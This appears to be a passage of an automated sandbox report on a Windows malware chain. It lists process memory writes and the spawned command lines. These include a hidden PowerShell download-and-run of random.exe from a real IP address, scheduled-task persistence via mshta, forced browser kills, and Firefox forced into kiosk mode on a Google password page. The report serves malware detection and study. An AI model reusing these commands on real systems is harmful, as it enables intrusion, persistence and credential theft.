N/A N/A C:\Users\Admin\AppData\Local\Temp\10062910101\4e7fab29a7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062910101\4e7fab29a7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062940101\26d8edfd34.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062940101\26d8edfd34.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062940101\26d8edfd34.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062940101\26d8edfd34.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062950101\f33a39d263.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062950101\f33a39d263.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062720101\a16b636c8b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062720101\a16b636c8b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062720101\a16b636c8b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062720101\a16b636c8b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062720101\a16b636c8b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062720101\a16b636c8b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4900 wrote to memory of 4284 N/A C:\Users\Admin\AppData\Local\Temp\3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 4900 wrote to memory of 4284 N/A C:\Users\Admin\AppData\Local\Temp\3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 4900 wrote to memory of 4284 N/A C:\Users\Admin\AppData\Local\Temp\3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 4284 wrote to memory of 3668 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10062550101\UXwM0dy.exe
PID 4284 wrote to memory of 3668 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10062550101\UXwM0dy.exe
PID 3668 wrote to memory of 4700 N/A C:\Users\Admin\AppData\Local\Temp\10062550101\UXwM0dy.exe C:\Users\Admin\AppData\Local\Microsoft\OneDrive\SettingsHandlers.OneDriveSaving.exe
PID 3668 wrote to memory of 4700 N/A C:\Users\Admin\AppData\Local\Temp\10062550101\UXwM0dy.exe C:\Users\Admin\AppData\Local\Microsoft\OneDrive\SettingsHandlers.OneDriveSaving.exe
PID 4700 wrote to memory of 4960 N/A C:\Users\Admin\AppData\Local\Microsoft\OneDrive\SettingsHandlers.OneDriveSaving.exe C:\Users\Admin\AppData\Local\Microsoft\OneDrive\SavingsSync\OneDriveSavingService.exe
PID 4700 wrote to memory of 4960 N/A C:\Users\Admin\AppData\Local\Microsoft\OneDrive\SettingsHandlers.OneDriveSaving.exe C:\Users\Admin\AppData\Local\Microsoft\OneDrive\SavingsSync\OneDriveSavingService.exe
PID 4284 wrote to memory of 1824 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10062560101\UXwM0dy.exe
PID 4284 wrote to memory of 1824 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10062560101\UXwM0dy.exe
PID 4960 wrote to memory of 656 N/A C:\Users\Admin\AppData\Local\Microsoft\OneDrive\SavingsSync\OneDriveSavingService.exe C:\Users\Admin\AppData\Roaming\winsvcs\WindowsPrinterService.exe
PID 4960 wrote to memory of 656 N/A C:\Users\Admin\AppData\Local\Microsoft\OneDrive\SavingsSync\OneDriveSavingService.exe C:\Users\Admin\AppData\Roaming\winsvcs\WindowsPrinterService.exe
PID 4284 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10062570101\12c2d2f481.exe
PID 4284 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10062570101\12c2d2f481.exe
PID 4284 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10062720101\a16b636c8b.exe
PID 4284 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10062720101\a16b636c8b.exe
PID 4284 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10062720101\a16b636c8b.exe
PID 4116 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\10062720101\a16b636c8b.exe C:\Windows\SysWOW64\cmd.exe
PID 4116 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\10062720101\a16b636c8b.exe C:\Windows\SysWOW64\cmd.exe
PID 4116 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\10062720101\a16b636c8b.exe C:\Windows\SysWOW64\cmd.exe
PID 4116 wrote to memory of 4916 N/A C:\Users\Admin\AppData\Local\Temp\10062720101\a16b636c8b.exe C:\Windows\SysWOW64\mshta.exe
PID 4116 wrote to memory of 4916 N/A C:\Users\Admin\AppData\Local\Temp\10062720101\a16b636c8b.exe C:\Windows\SysWOW64\mshta.exe
PID 4116 wrote to memory of 4916 N/A C:\Users\Admin\AppData\Local\Temp\10062720101\a16b636c8b.exe C:\Windows\SysWOW64\mshta.exe
PID 2200 wrote to memory of 992 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2200 wrote to memory of 992 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2200 wrote to memory of 992 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4916 wrote to memory of 4936 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4916 wrote to memory of 4936 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4916 wrote to memory of 4936 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4284 wrote to memory of 5084 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 4284 wrote to memory of 5084 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 4284 wrote to memory of 5084 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 5084 wrote to memory of 2640 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 5084 wrote to memory of 2640 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 5084 wrote to memory of 2640 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 3564 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2640 wrote to memory of 3564 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2640 wrote to memory of 3564 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2640 wrote to memory of 3896 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 3896 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 3896 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3896 wrote to memory of 2120 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3896 wrote to memory of 2120 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3896 wrote to memory of 2120 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2640 wrote to memory of 4340 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 4340 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 4340 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4340 wrote to memory of 4388 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4340 wrote to memory of 4388 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4340 wrote to memory of 4388 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2640 wrote to memory of 1404 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 1404 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 1404 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1404 wrote to memory of 4552 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1404 wrote to memory of 4552 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1404 wrote to memory of 4552 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4284 wrote to memory of 4464 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe
PID 4284 wrote to memory of 4464 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe
PID 4284 wrote to memory of 4464 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe
PID 2640 wrote to memory of 2076 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2640 wrote to memory of 2076 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2640 wrote to memory of 2076 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2640 wrote to memory of 4448 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\mshta.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77.exe

"C:\Users\Admin\AppData\Local\Temp\3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\10062550101\UXwM0dy.exe

"C:\Users\Admin\AppData\Local\Temp\10062550101\UXwM0dy.exe"

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\SettingsHandlers.OneDriveSaving.exe

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\SavingsSync\OneDriveSavingService.exe

C:\Users\Admin\AppData\Local\Temp\10062560101\UXwM0dy.exe

"C:\Users\Admin\AppData\Local\Temp\10062560101\UXwM0dy.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Roaming\winsvcs\WindowsPrinterService.exe

"C:/Users/Admin/AppData/Roaming/winsvcs/WindowsPrinterService.exe"

C:\Users\Admin\AppData\Local\Temp\10062570101\12c2d2f481.exe

"C:\Users\Admin\AppData\Local\Temp\10062570101\12c2d2f481.exe"

C:\Users\Admin\AppData\Local\Temp\10062720101\a16b636c8b.exe

"C:\Users\Admin\AppData\Local\Temp\10062720101\a16b636c8b.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn FKRjwmaq1Wy /tr "mshta C:\Users\Admin\AppData\Local\Temp\Ro1bFndli.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\Ro1bFndli.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn FKRjwmaq1Wy /tr "mshta C:\Users\Admin\AppData\Local\Temp\Ro1bFndli.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'DYGSWKX2LYZUHEALVPVSVELUY8PS3KUJ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10062730121\am_no.cmd" "

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\10062730121\am_no.cmd" any_word

C:\Windows\SysWOW64\timeout.exe

timeout /t 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe

"C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "j0vHkma9RZa" /tr "mshta \"C:\Temp\7Ate2U9Z1.hta\"" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta "C:\Temp\7Ate2U9Z1.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\Temp\10062790101\JqGBbm7.exe

"C:\Users\Admin\AppData\Local\Temp\10062790101\JqGBbm7.exe"

C:\Users\Admin\AppData\Local\Temp\10062890101\3efcc3b4c6.exe

"C:\Users\Admin\AppData\Local\Temp\10062890101\3efcc3b4c6.exe"

C:\Users\Admin\AppData\Local\Temp\10062890101\3efcc3b4c6.exe

"C:\Users\Admin\AppData\Local\Temp\10062890101\3efcc3b4c6.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 1996 -ip 1996

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 800

C:\Users\Admin\AppData\Local\Temp\10062900101\92d896b7a7.exe

"C:\Users\Admin\AppData\Local\Temp\10062900101\92d896b7a7.exe"

C:\Users\Admin\AppData\Local\Temp\10062910101\4e7fab29a7.exe

"C:\Users\Admin\AppData\Local\Temp\10062910101\4e7fab29a7.exe"

C:\Users\Admin\AppData\Local\Temp\10062920101\2157e39777.exe

"C:\Users\Admin\AppData\Local\Temp\10062920101\2157e39777.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\10062930101\13866c738c.exe

"C:\Users\Admin\AppData\Local\Temp\10062930101\13866c738c.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\10062940101\26d8edfd34.exe

"C:\Users\Admin\AppData\Local\Temp\10062940101\26d8edfd34.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\10062950101\f33a39d263.exe

"C:\Users\Admin\AppData\Local\Temp\10062950101\f33a39d263.exe"

C:\Users\Admin\AppData\Local\Temp\3H3K555D7JDX1PMQ5U9LJFN9WVU5S.exe

"C:\Users\Admin\AppData\Local\Temp\3H3K555D7JDX1PMQ5U9LJFN9WVU5S.exe"

C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe

"C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefox.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM chrome.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msedge.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM opera.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM brave.exe /T

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1980 -parentBuildID 20240401114208 -prefsHandle 1900 -prefMapHandle 1892 -prefsLen 27209 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8c4156f6-e391-4bc0-b594-466f9199cb58} 2580 "\\.\pipe\gecko-crash-server-pipe.2580" gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2468 -parentBuildID 20240401114208 -prefsHandle 2444 -prefMapHandle 2400 -prefsLen 28129 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d80d95b0-4188-4705-a6b6-d07318703a7e} 2580 "\\.\pipe\gecko-crash-server-pipe.2580" socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2848 -childID 1 -isForBrowser -prefsHandle 3024 -prefMapHandle 3040 -prefsLen 22746 -prefMapSize 244658 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {42760d12-e141-42ce-b531-b4a97c9ea3b1} 2580 "\\.\pipe\gecko-crash-server-pipe.2580" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4124 -childID 2 -isForBrowser -prefsHandle 4116 -prefMapHandle 4112 -prefsLen 32619 -prefMapSize 244658 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9ac157a1-f8fb-4adc-b3bb-7ed18f7fd852} 2580 "\\.\pipe\gecko-crash-server-pipe.2580" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4660 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4744 -prefMapHandle 4740 -prefsLen 32619 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {563cdd56-265b-4054-a3ce-c3d948f9d5f7} 2580 "\\.\pipe\gecko-crash-server-pipe.2580" utility

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5264 -childID 3 -isForBrowser -prefsHandle 5012 -prefMapHandle 5360 -prefsLen 27226 -prefMapSize 244658 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5d4ea74e-7da4-4994-9ef7-ef8eb95057de} 2580 "\\.\pipe\gecko-crash-server-pipe.2580" tab

C:\Program Files\Mozilla Firefox\firefox.exe

